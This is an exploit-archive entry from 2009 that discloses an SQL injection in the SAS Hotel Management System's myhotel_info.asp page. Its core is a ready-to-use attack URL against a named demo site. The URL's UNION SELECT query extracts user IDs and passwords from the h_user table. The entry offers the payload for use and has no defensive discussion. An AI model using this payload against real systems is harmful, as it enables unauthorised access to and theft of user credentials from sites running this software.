[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln
# Published : 2009-02-16
# Author : DarkB0x
# Previous Title : MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# Next Title : YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability


#found by DarkB0x
#contact darkB0x97[AT]googlemail.com
#greets for str0ke & AlpHaNiX

#script           : SAS Hotel Management System
#download         : Null
#script home page : http://www.sellatsite.com/sellatsite/hotel.asp
#Demo             : http://www.aebest.com


#Exploits :

//*/

http://www.aebest.com/home/myhotel_info.asp?id=0+and+1=0+union+select+0,userid,0,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+h_user


#note : the injection's details are in page title ! xD

# www.Syue.com [2009-02-16]